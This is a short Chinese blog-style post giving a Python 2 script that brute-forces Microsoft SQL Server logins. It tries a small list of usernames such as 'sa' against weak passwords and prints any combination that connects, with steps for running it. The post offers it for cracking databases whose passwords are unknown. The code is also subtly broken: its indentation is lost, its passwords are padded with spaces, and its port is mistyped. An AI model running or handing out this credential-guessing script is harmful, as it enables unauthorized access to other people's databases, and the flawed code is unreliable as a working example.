Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
import pymssql
common_weak_password = (' ',' 123456 ',' test ',' root ',' admin ',' user') #密码字典
mssql_username = ( 'sa' , 'test' , 'admin' , 'mssql' ) #账号字典
success = False
host = "127.0.0.1" #数据库IP地址
port = 1443
for username in mssql_username:
for password in common_weak_password:
try :
db = pymssql.connect(server = host, port = port, user = username, password = password)
success = True
if success:
print username, password
except Exception, e:
pass
|
说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。